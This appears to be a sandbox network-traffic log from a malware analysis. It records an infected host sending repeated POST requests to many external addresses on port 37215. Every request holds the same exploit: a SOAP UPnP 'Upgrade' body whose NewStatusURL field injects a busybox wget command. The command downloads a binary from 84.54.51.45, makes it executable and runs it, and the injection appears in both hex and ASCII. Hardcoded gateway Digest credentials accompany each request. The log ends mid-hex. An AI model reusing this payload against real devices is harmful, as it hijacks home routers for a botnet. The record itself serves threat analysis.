                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            904192.168.2.155839841.219.199.3537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744858027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            905192.168.2.153687641.7.213.25137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744895935 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            906192.168.2.154813641.248.82.21037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744916916 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            907192.168.2.155633641.144.171.15337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744940042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            908192.168.2.155665041.204.177.7837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744940042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            909192.168.2.154401441.69.49.17537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744987011 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            910192.168.2.153517041.166.77.14337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744993925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            911192.168.2.155267441.80.131.9137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745038986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            912192.168.2.155842641.78.70.17937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745074034 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            913192.168.2.153690641.243.187.5737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745086908 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 